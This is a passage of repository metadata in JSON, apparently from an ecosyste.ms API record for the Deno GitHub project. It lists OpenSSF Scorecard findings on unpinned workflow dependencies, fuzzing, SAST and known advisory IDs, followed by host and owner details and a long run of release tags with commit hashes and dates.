.github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/deno